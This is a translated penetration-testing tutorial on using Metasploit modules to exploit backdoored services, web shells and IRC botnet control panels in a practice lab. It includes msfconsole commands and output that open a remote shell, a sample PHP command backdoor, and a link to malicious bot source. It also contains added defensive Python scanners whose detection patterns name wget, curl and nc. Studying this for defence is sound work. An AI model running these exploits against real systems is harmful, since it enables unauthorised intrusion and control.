Technology disclosure: How hackers use Metasploit to take over backdoors and botnets

Source: Internet
Author: User
The Metasploit Framework contains many exploits, including buffer overflows, browser exploits, web application vulnerabilities, backdoor exploits, botnet takeover tools, and more. Exploit developers and contributors to the framework have shared a lot of interesting and useful work.

In this article we discuss using Metasploit to attack and take over common backdoors and botnets. We won't cover every module, but we will mention some that you may use in future penetration tests or work. We are not developing exploits here, so you won't need a debugger or a code editor.

If you're just beginning to use msfconsole (the framework's command-line interface) to work with Metasploit, don't worry: this is a step-by-step guide to using exploit modules. The tutorial requires only one thing: Metasploit installed on your attacking machine. I recommend Kali Linux or BackBox, penetration-testing distributions that ship with Metasploit pre-installed.

For the target machine, I suggest installing Metasploitable 2 on your favourite virtualization platform, such as VMware or VirtualBox. Metasploitable 2 is an intentionally vulnerable Ubuntu Linux virtual machine that you can use to practise with Metasploit, because it ships with several insecure programs.

The Metasploitable 2 virtual machine is configured with services that contain backdoors and publicly known vulnerabilities.

On port 6667, Metasploitable 2 runs a backdoored UnrealIRCd IRC daemon. The backdoor is triggered by sending the letters "AB", and it lets an attacker execute arbitrary system commands with the privileges of the user running ircd. This is a good exploit to practise on, so let's try to pop a shell. Fortunately, Metasploit already has an exploit module for this vulnerability, located at exploit/unix/irc/unreal_ircd_3281_backdoor.

Run msfconsole to open the Metasploit command-line interface. Enter info exploit/unix/irc/unreal_ircd_3281_backdoor to see the module's description: "This module exploits a malicious backdoor that was added to the Unreal IRCd 3.2.8.1 download package. The backdoor was present in the Unreal3.2.8.1.tar.gz archive from November 2009 to June 12, 2010."

Now it's time to attack the backdoored service!

We got a shell. For details on the other backdoored services, see the Metasploitable 2 Exploitability Guide.

Weren't we supposed to be talking about backdoor and botnet takeover? Yes! We're just getting started; so far we've only given a short introduction to using msfconsole to attack the backdoor in the UnrealIRCd service.

Our goal is to introduce something a little different. Metasploit already has this type of module, which does not rely on remote code execution in web applications or on buffer overflows in applications or services.

In the next example we'll use the Simple Backdoor Shell Remote Code Execution module, which I wrote, to attack a web backdoor. This module targets simple web backdoors that execute commands taken from a request parameter, which is how common backdoor shells work.

Daniel Miessler and Jason Haddix's OWASP SecLists project has many examples of these backdoor shells, categorized under Payloads.

Before we explore the Simple Backdoor Shell Remote Code Execution module, we first create a backdoor shell on the target machine. I recommend installing an Apache server on a Linux virtual machine and writing the following vulnerable code:

I placed this code at /var/www/html/msfdev/vulnerable.php on the Ubuntu VM so that it can be reached from a browser at http://localhost/msfdev/vulnerable.php. As shown, this proof of concept executes arbitrary commands passed through the exec parameter.
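A defender's counterpart to the backdoor shell described above: a static check that walks a web root and flags PHP files where a request parameter reaches a command-execution function, including the two-step case where the command is first staged in a variable. This is an added example, not code from the original article; the PHP samples embedded in it are constructed for illustration.

```python
"""Static check for PHP files that pass request parameters into a command
sink, the pattern behind the vulnerable.php backdoor described above.
Added example, not from the original article; the PHP samples are constructed."""
import os
import re

# PHP functions that hand a string to a shell or to the PHP interpreter.
SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")
# Request superglobals that carry attacker-controlled input.
_SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]")
_SINK_CALL = re.compile(r"\b(%s)\s*\(([^;]*)\)" % "|".join(SINKS))
_ASSIGN = re.compile(r"(\$\w+)\s*=\s*([^;]+);")
_VARS = re.compile(r"\$\w+")

def find_backdoor_sinks(php_source):
    """Return [(line_no, sink, argument)] for every sink call whose argument
    is request input, either directly or via a variable assigned from request
    input earlier in the file (a one-pass, line-level taint check)."""
    tainted = set()  # variables known to hold request input
    hits = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        # Propagate taint through simple assignments: $c = $_GET['exec'];
        for var, rhs in _ASSIGN.findall(line):
            if _SOURCE.search(rhs) or tainted & set(_VARS.findall(rhs)):
                tainted.add(var)
        for sink, arg in _SINK_CALL.findall(line):
            if _SOURCE.search(arg) or tainted & set(_VARS.findall(arg)):
                hits.append((line_no, sink, arg.strip()))
    return hits

def scan_webroot(root):
    """Walk a web root and map each PHP file to its suspicious sink calls."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith((".php", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_backdoor_sinks(fh.read())
                if hits:
                    findings[path] = hits
    return findings

# Constructed samples: a one-liner like the article's backdoor, a two-step
# variant that stages the command in a variable, and a benign page.
BACKDOOR = "<?php system($_GET['exec']); ?>"
INDIRECT = "<?php\n$c = $_REQUEST['cmd'];\n$out = shell_exec($c . ' 2>&1');\necho $out;\n?>"
BENIGN = "<?php echo htmlspecialchars($_GET['name']); ?>"
```

The taint check is deliberately line-level and ignores string concatenation tricks or obfuscated calls, so treat a clean result as a first pass rather than proof of absence.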

Now we use the Simple Backdoor Shell Remote Code Execution module.

As the output of the show options command shows, several options must be set (besides RHOST, RPORT, and the other common options): METHOD specifies the HTTP method, TARGETURI specifies the path to the backdoor shell, and VAR specifies the parameter, i.e. the command variable.

Assuming our target's IP address is 192.168.150.136, we set RHOST to that address and point at our backdoor shell by setting TARGETURI to /msfdev/vulnerable.php. Then there is the VAR option, which we set to exec so that arbitrary commands can be executed. We don't need to set the HTTP method, because the web application accepts GET and a GET request is enough to exploit it.

msf exploit(simple_backdoors_exec) > set rhost 192.168.150.136
rhost => 192.168.150.136
msf exploit(simple_backdoors_exec) > set var exec
var => exec
msf exploit(simple_backdoors_exec) > set targeturi /msfdev/vulnerable.php
targeturi => /msfdev/vulnerable.php
msf exploit(simple_backdoors_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo We5lyqtbehiwwfd4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "We5lyqtbehiwwfd4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.150.129:4444 -> 192.168.150.136:49484) at 2016-02-22 09:24:57 -0500

We successfully popped a second shell! That's the whole process of attacking a web shell with this module.
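On the defending side, the session above leaves a recognizable trace in the web server's access log: the module first sends "echo <random token>;" through the backdoor parameter to confirm execution, then the real command. The following added example (not from the original article) parses Apache combined-format log lines and flags query parameters that carry that token check or a shell command; the log lines are constructed, reusing the IPs and the echo token from the transcript, and the rule names and command list are my own choices.

```python
"""Flag web requests that carry a shell command in a query parameter, the
pattern of the backdoor-shell exploitation shown above. Added example, not
from the original article; the log lines below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# The execution check seen in the transcript: "echo <random token>;" as the whole value.
ECHO_TOKEN = re.compile(r"^echo\s+[A-Za-z0-9]{8,}\s*;?\s*$")
# Shell metacharacters, or a value that starts with a common command name.
META = re.compile(r"[;|`]|\$\(|&&")
CMD_START = re.compile(
    r"^(?:/bin/|/usr/bin/)?(?:sh|bash|id|uname|whoami|wget|curl|nc|perl|python|cat|ls)\b")

def classify_value(value):
    """Return the name of the rule a decoded parameter value trips, or None."""
    if ECHO_TOKEN.match(value):
        return "exec-check-token"
    if META.search(value) or CMD_START.match(value):
        return "shell-command"
    return None

def detect_backdoor_requests(log_lines):
    """Parse combined-format access log lines and return one finding per
    suspicious parameter: (client_ip, path, parameter, decoded_value, rule)."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, _ts, _method, target, _status = m.groups()
        url = urlsplit(target)
        # parse_qs percent-decodes values and turns '+' into spaces for us
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                rule = classify_value(value)
                if rule:
                    findings.append((ip, url.path, param, value, rule))
    return findings

SAMPLE_LOG = [
    '192.168.150.129 - - [22/Feb/2016:09:24:57 -0500] "GET /msfdev/vulnerable.php?exec=echo%20We5lyqtbehiwwfd4%3B HTTP/1.1" 200 18 "-" "Mozilla/4.0"',
    '192.168.150.129 - - [22/Feb/2016:09:24:58 -0500] "GET /msfdev/vulnerable.php?exec=id%3Buname%20-a HTTP/1.1" 200 92 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [22/Feb/2016:09:30:01 -0500] "GET /search.php?q=echo+chamber&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    "not a log line",
]
```

Only GET requests are visible this way; a shell reached through POST parameters needs request-body logging or a WAF to see the same pattern.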

Here are some other exploit modules of this type:

Th3 MMA mma.php Backdoor Arbitrary File Upload – This module attacks the Th3 MMA mma.php backdoor, which allows arbitrary file upload and therefore arbitrary code execution. Because it calls php_uname(), the backdoor also discloses the Linux kernel version or operating system version.

Zemra Botnet CNC Web Panel Remote Code Execution – This module attacks the command-and-control web panel of the Zemra botnet, whose leaked source code contains a backdoor. Zemra is DDoS malware discovered by Symantec and named Backdoor.Zemra.

China Chopper Caidao PHP Backdoor Code Execution – This module attacks the China Chopper webshell, which is widely used by Chinese attackers.

Horde 3.3.12 Backdoor Arbitrary PHP Code Execution – This module attacks the backdoor in Horde 3.3.12 and Horde Groupware 1.2.10 that allows arbitrary PHP code execution.

OpenX Backdoor PHP Code Execution – From at least November 2012 to August 2013, a hidden backdoor was present in OpenX Ad Server version 2.8.10. Exploitation is very simple and only requires sending a single request carrying a ROT13'd, back-connect payload.

Stunshell Web Shell Remote PHP Code Execution – This module attacks unauthenticated versions of the "STUNSHELL" webshell. The module works when safe mode is enabled on the web server. This shell is widely used in automated RFI payloads.

And so on; the list keeps growing. You can find more modules with the command search backdoor.

Another type of module I wrote and contributed is for botnet takeover. A good example is W3tw0rk/Pitbul IRC Bot Remote Code Execution. This module attacks the W3tw0rk bot by registering your nickname as, or pretending to be, the administrator or master of the IRC channel the bot is registered to.

I'll leave this as a challenge for you, so I won't explain what the options mean or how to attack such botnets; a screenshot of the exploit is already provided. By now you'll have recognized the pattern for configuring Metasploit modules from the earlier steps.

Here is the source of the W3tw0rk/Pitbul IRC bot script, which can be used to launch DDoS (distributed denial of service) or DoS (denial of service) attacks:

https://github.com/shipcod3/IRC-Bot-Hunters/blob/master/malicious_samples/w3tw0rk.txt. If you run it in your virtual machine, make sure it connects to your own IRC server, so that your VM is not controlled by other botnet herders or malware crusaders.

Most of the botnet exploit modules I wrote were inspired by the PHP IRC Bot pbot eval() Remote Code Execution module, the first IRC botnet exploit in Metasploit. According to its description: "This module allows remote command execution on the PHP IRC bot pbot due to the misuse of the eval() function in the implementation of the .php command. The module was successfully tested on the pbot version analysed by Jay Turla and published at the InfoSec Institute, running on Ubuntu 10.04 and Windows XP SP3."

I am not responsible for any damage caused by this script; please use it for educational purposes only.

Other exploit modules related to botnet takeover:

xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution – This module allows remote command execution on an IRC bot developed by xdh. This Perl bot was captured by Conor Patrick with his Shellshock honeypot server and classified by Markus Zanke as fBot (Fire & Forget – DDoS Bot). Matt Thayer also found this script with the LinuxNet perlbot description. The bot only answers to the service name and nickname configured in the Perl script, so to attack the bot you need to be able to manipulate the IRC network to trick it, or at least come from the same IP address as the one configured.

Ra1nx PHP Bot PubCall Authentication Bypass Remote Code Execution – This module allows remote command execution on the ra1nx PHP IRC bot by using the public call feature in private messages to covertly bypass the authentication system.

Legend Perl IRC Bot Remote Code Execution – This module allows remote command execution on the Legend Perl IRC bot. In October 2014 the bot was used as a payload in the Shellshock spam. This particular bot has features such as Nmap scanning, TCP, HTTP, SQL, and UDP flood attacks, clearing system logs, gaining root privileges, and VNC scanning. Kevin Stevens, a senior threat researcher at Damballa, uploaded the script to VirusTotal; its MD5 is 11a9f1589472efa719827079c3d13f76.

Dexter (CasinoLoader) SQL Injection – This module attacks a vulnerability found in the command and control panel used to control Dexter. Exploitation is achieved through a PHP page (gateway.php) used by the bots, which does not sanitize its input. The input is encrypted and encoded. The command and control panel specifies the location of an uploaded file, which can be used as a reliable location for writing a PHP shell. No authentication is required to exploit this vulnerability.

References:

https://community.rapid7.com/docs/DOC-1875

https://forums.unrealircd.org/viewtopic.php?t=6562

https://github.com/rapid7/metasploit-framework/

* Original: InfoSec Institute; compiled by Felix. When reproducing, please credit FreeBuf (freebuf.com).
